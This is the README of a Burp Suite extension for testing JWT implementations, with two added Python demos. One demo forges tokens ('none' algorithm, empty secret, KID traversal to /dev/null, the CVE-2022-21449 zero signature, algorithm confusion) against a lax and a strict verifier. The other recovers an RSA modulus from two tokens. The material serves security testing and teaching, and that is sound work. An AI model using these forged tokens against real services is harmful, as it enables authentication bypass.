# JWT-scanner - Burp Extension

Repository: https://github.com/CompassSecurity/jwt-scanner (CompassSecurity, Java, MIT license; previously named compasssecurity/jwt-attacker; last pushed 2024-05-21).

## Description
JWT Scanner is a Burp Suite extension for automated testing of JSON Web Token (JWT) implementations in web applications.

## Features
- Automatically detects JWTs in the selected base request.
- Allows manual selection of the target JWT in the base request.
- Allows selecting two base requests with different JWTs to attempt forging the public key.

### Checks
- Determines whether the algorithm is symmetric, asymmetric, or unknown. If symmetric, brute-forcing may be attempted (not implemented yet, see Limitations).
- Checks whether the JWT has an expiry (`exp`). If it does not, an alert is generated. If it has already expired, the scanner checks whether it is still accepted; if so, an alert is generated; if not, an issue is raised because the remaining checks may not work. It is advised not to select an already expired JWT. If the JWT has not yet expired, a check is scheduled to verify once the expiry is reached whether the JWT is still accepted; if it is, the corresponding alert is displayed.
- Checks and alerts if the JWT is accepted without a signature.
- Checks and alerts if the JWT is accepted with an invalid signature.
- Checks and alerts if the JWT is accepted when signed symmetrically (HMAC) with an empty password.
- Checks and alerts if the JWT is accepted with variations of the "none" algorithm (e.g., none, NONE, NoNE).
- Checks and alerts if JWT verification is vulnerable to CVE-2022-21449 (Java 15 to 18 ECDSA accepting a signature with r = s = 0).
- Checks and alerts if the JWT is accepted with an injected JWK header containing a self-generated public key.
- Checks and alerts if the server calls the URL in the JKU header (JKU pingback).
- Checks and alerts if the JWT is accepted with an injected JKU header pointing to a custom host that serves a self-generated public key.
- Checks and alerts if the JWT is accepted when the KID header points to ../../../../../../../dev/null and the JWT is signed with an empty password (KID path traversal).
- Checks for exposed public keys via the JKU header or well-known paths.
- Checks and alerts if the JWT is accepted when signed symmetrically with the exposed public key as the HMAC secret (algorithm confusion).
- Checks and alerts if the JWT is accepted when signed symmetrically with a forged (recovered) public key (algorithm confusion).
- If any check makes the server respond with status code 500 (Internal Server Error), an issue is created, as this may be worth investigating further.

## Limitations
- Brute-forcing of symmetric keys is not implemented.
- KID path traversal is limited, as only one path (../../../../../../../dev/null) is attempted.
- Forging a public key requires the gmp native library (see https://gmplib.org). Compiled binaries are only supplied for the most common architectures via the JAR file (linux_64, windows_64, macos_64, macos_arm64).

## Benchmarks

### Compass Demo
```
https://www.compass-demo.com/jwt_lab/

Level 1:  PASS
Level 2:  PASS
Level 3:  PASS
Level 4:  FAIL  note: brute-forcing key not implemented
Level 5:  PASS
```

### Portswigger Labs
```
https://portswigger.net/web-security/all-labs#jwt

JWT authentication bypass via unverified signature:                     PASS
JWT authentication bypass via flawed signature verification:            PASS
JWT authentication bypass via weak signing key:                         FAIL  note: brute-forcing key not implemented
JWT authentication bypass via jwk header injection:                     PASS
JWT authentication bypass via jku header injection:                     FAIL  note: the lab does not resolve external URLs
JWT authentication bypass via kid header path traversal:                PASS
JWT authentication bypass via algorithm confusion:                      PASS
JWT authentication bypass via algorithm confusion with no exposed key:  PASS
```

### NeuraLegion brokencrystals
```
https://github.com/NeuraLegion/brokencrystals

Invalid Signature              PASS
KID SQL Injection              FAIL  note: sql-injection via kid header not implemented
Brute Forcing Weak Secret Key  FAIL  note: brute-forcing key not implemented
RSA to HMAC                    FAIL  note: cannot craft a valid base request
X5U Rogue Key                  FAIL  note: not implemented
X5C Rogue Key                  FAIL  note: not implemented
JKU Rogue Key                  FAIL  note: jku pointing to a "JWK" not "JWK Set" (https://github.com/NeuraLegion/brokencrystals/issues/511)
JWK Rogue Key                  PASS
```

## Usage
Run an active scan or manually select a request to check:

1. Go to Proxy / Repeater / Target / Logger / Intruder
2. Select a request that requires authentication with a valid JWT and returns an HTTP 200 response

### Automatically detect JWT
1. Right-click the request you want to check.
2. Extensions -> JWT Scanner -> Scan (autodetect)
3. For each identified vulnerability an issue is generated

Autodetect JWT from valid request:

![](docs/auto_select.png)

### Manually select JWT
1. Highlight the target JWT in the request
2. Right-click the highlighted JWT
3. Extensions -> JWT Scanner -> Scan selected
4. For each identified vulnerability an issue is generated

Manually select JWT from valid request:

![](docs/manual_select.png)

### Forging public keys

If a public key is not exposed, you can try to forge one.

1. Select two base requests, each containing exactly one JWT, with a different JWT in each
2. Right-click the highlighted JWT requests
3. Extensions -> JWT Scanner -> Forge public key
4. Check the Event and Issue log
5. If successful, rerun "Scan (autodetect)" or "Scan selected"

![](docs/forge_public_key.png)

## Installation
1. Download the latest pre-built jar file from [releases](https://github.com/CompassSecurity/jwt-scanner/releases).
2. Extensions -> Installed -> Add -> Extension Details -> Extension Type: *Java* -> Select file ...
3. Select the downloaded jar

## Build
Build the jar with Gradle:
```shell
./gradlew jar
```
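The following is an added example, not code from jwt-scanner (which is written in Java). It builds, in standard-library Python, the forged tokens behind the signature checks listed under Checks above (no signature, invalid signature, empty HMAC secret, "none" variants, KID traversal to /dev/null, the CVE-2022-21449 all-zero ES256 signature, and HS256 algorithm confusion with a public key as the secret) and runs them against a deliberately lax verifier and a strict one, so the accepted/rejected split is visible. The base token, secret, `kid` value and the placeholder PEM are constructed for the demo; `KEY_FILES` stands in for a server that reads its key from the file named by `kid`. ECDSA and RSA verification are not modelled, and the JWK/JKU checks need a server-side fetch and are not shown.

```python
import base64
import hashlib
import hmac
import json
import time

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def signing_input(header, payload):
    enc = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    return enc(header) + "." + enc(payload)

def hs256(header, payload, key):
    data = signing_input(header, payload)
    return data + "." + b64url(hmac.new(key, data.encode(), hashlib.sha256).digest())

def parse(token):
    head, body, sig = token.split(".")
    return json.loads(b64url_decode(head)), json.loads(b64url_decode(body)), sig

def variants(token, public_key_pem=None):
    """One forged token per check. Claims stay unchanged: if the server accepts
    any of these, its signature check is broken whatever the payload says."""
    header, payload, sig = parse(token)
    base = signing_input(header, payload)
    out = {"no_signature": base + "."}
    tampered = bytearray(b64url_decode(sig))
    tampered[-1] ^= 0x01                          # flip one bit of the real signature
    out["invalid_signature"] = base + "." + b64url(bytes(tampered))
    out["empty_secret"] = hs256({**header, "alg": "HS256"}, payload, b"")
    for alg in ("none", "None", "NONE", "NoNE"):
        out["alg_" + alg] = signing_input({**header, "alg": alg}, payload) + "."
    # kid path traversal: a server that reads its key from the file named by kid
    # gets an empty key from /dev/null, so the token is signed with the empty key
    traversal = {**header, "alg": "HS256", "kid": "../../../../../../../dev/null"}
    out["kid_dev_null"] = hs256(traversal, payload, b"")
    # CVE-2022-21449: JDK 15-18 ECDSA accepted r = s = 0, i.e. 64 zero bytes for ES256
    zero = signing_input({**header, "alg": "ES256"}, payload)
    out["es256_zero_sig"] = zero + "." + b64url(bytes(64))
    if public_key_pem:
        # algorithm confusion: HMAC with the server's own public key bytes as the secret
        out["alg_confusion"] = hs256({**header, "alg": "HS256"}, payload, public_key_pem)
    return out

KEY_FILES = {"../../../../../../../dev/null": b""}  # stand-in for open(kid, "rb").read()

def lax_verify(token, key_material):
    """Deliberately broken: accepts an empty signature, trusts alg from the header,
    takes the key from the path in kid and feeds whatever key it holds to HMAC."""
    header, _, sig = parse(token)
    alg = header.get("alg", "")
    if not sig or alg.lower() == "none":
        return True
    if alg == "HS256":
        key = KEY_FILES.get(header.get("kid"), key_material)
        expected = hmac.new(key, token.rsplit(".", 1)[0].encode(), hashlib.sha256).digest()
        return hmac.compare_digest(expected, b64url_decode(sig))
    return False  # RS256/ES256 not modelled; a JDK 15-18 verifier would accept es256_zero_sig

def strict_verify(token, keys, now=None):
    """Algorithm pinned server-side, kid only a lookup into known keys, signature
    checked before claims are trusted, exp required."""
    header, payload, sig = parse(token)
    kid = header.get("kid")
    if header.get("alg") != "HS256" or not isinstance(kid, str) or kid not in keys:
        return False
    expected = hmac.new(keys[kid], token.rsplit(".", 1)[0].encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return False
    exp = payload.get("exp")
    return isinstance(exp, int) and exp > (int(time.time()) if now is None else now)

# Constructed demo data; the PEM is a placeholder standing in for a leaked RS256 public key
SECRET = b"constructed-demo-secret"
FAKE_PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nPLACEHOLDERnotArealKey==\n-----END PUBLIC KEY-----\n"
BASE = hs256({"alg": "HS256", "typ": "JWT", "kid": "k1"}, {"sub": "alice", "exp": 4102444800}, SECRET)

def run_demo():
    """name -> (lax server holding SECRET, lax server holding the PEM, strict server)."""
    return {name: (lax_verify(tok, SECRET), lax_verify(tok, FAKE_PUBLIC_KEY_PEM),
                   strict_verify(tok, {"k1": SECRET}, now=0))
            for name, tok in variants(BASE, FAKE_PUBLIC_KEY_PEM).items()}

if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:18} lax/secret={result[0]!s:5} lax/pem={result[1]!s:5} strict={result[2]}")
```

For a real engagement the payload would also be changed (another `sub`, an elevated role) once a variant is accepted; the scanner only needs acceptance of an unchanged payload to prove the verification is broken. Note that the algorithm-confusion token must be HMAC'd with the exact bytes the server loaded for its public key (PKCS#1 vs SPKI form, with or without a trailing newline), which is why a placeholder PEM only works against a server holding that same placeholder.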
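Forging the public key from two base requests (the feature described under Features, Limitations and "Forging public keys" above) is the gcd technique over RS256 signatures: each signature satisfies s^e = EM (mod n), where EM is the PKCS#1 v1.5 encoding of the SHA-256 hash of the signing input, so n divides s^e - EM for every token, and the gcd over two tokens recovers n up to a small cofactor. The added example below is not the extension's code (which does this in Java with gmp); it carries the recovery out in standard-library Python with a constructed 512-bit toy key and e = 3, so it runs instantly. With a real 2048-bit key and e = 65537, s^e is about 16 MB, which is why the extension needs gmp. The header and payloads are constructed, and e is assumed known (in practice try 65537 first, then 3).

```python
import base64
import hashlib
import json
import math
import random

# DER prefix of the SHA-256 DigestInfo that PKCS#1 v1.5 (RS256) puts in front of the hash
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def emsa_pkcs1_v15(message, k):
    """EM = 00 01 FF..FF 00 DigestInfo||SHA-256(message), as an integer of k bytes."""
    t = SHA256_DIGESTINFO + hashlib.sha256(message).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def is_probable_prime(n, rounds=32):
    """Miller-Rabin for odd n > 3; enough for a demo key."""
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def generate_rsa(bits, e):
    """Toy key generation for this demo only; never use it for real keys."""
    def prime():
        while True:
            p = random.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
            if is_probable_prime(p) and math.gcd(p - 1, e) == 1:
                return p
    p, q = prime(), prime()
    while q == p:
        q = prime()
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))

def rs256_sign(header, payload, n, d):
    enc = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    data = enc(header) + "." + enc(payload)
    k = (n.bit_length() + 7) // 8
    return data + "." + b64url(pow(emsa_pkcs1_v15(data.encode(), k), d, n).to_bytes(k, "big"))

def rs256_verify(token, n, e):
    data, sig = token.rsplit(".", 1)
    raw = b64url_decode(sig)
    return pow(int.from_bytes(raw, "big"), e, n) == emsa_pkcs1_v15(data.encode(), len(raw))

def recover_modulus(tokens, e):
    """n divides s^e - EM for every token signed under n, so the gcd over two or
    more tokens is n times at most a small cofactor, which is stripped here."""
    g = 0
    for token in tokens:
        data, sig = token.rsplit(".", 1)
        raw = b64url_decode(sig)
        g = math.gcd(g, pow(int.from_bytes(raw, "big"), e) - emsa_pkcs1_v15(data.encode(), len(raw)))
    for f in range(2, 1 << 16):                   # n has no small factors; the cofactor usually does
        while g % f == 0:
            g //= f
    return g

def run_demo(seed=1):
    """Sign two different constructed payloads, then recover n from the tokens alone.
    Returns (true n, recovered n, e, tokens)."""
    random.seed(seed)                             # deterministic demo key
    n, e, d = generate_rsa(512, 3)
    header = {"alg": "RS256", "typ": "JWT", "kid": "k1"}
    tokens = [rs256_sign(header, {"sub": "alice", "exp": 4102444800}, n, d),
              rs256_sign(header, {"sub": "bob", "exp": 4102444800}, n, d)]
    return n, recover_modulus(tokens, e), e, tokens

if __name__ == "__main__":
    n, recovered, e, tokens = run_demo()
    print("recovered modulus matches:", recovered == n)
```

The recovered (n, e) pair is what the extension then serializes to a public key and feeds into the algorithm-confusion check; since the server's HMAC key in that attack is the byte string it loaded, the PEM has to be emitted in the form the server uses (SPKI or PKCS#1, with or without a trailing newline), and each form is tried in turn.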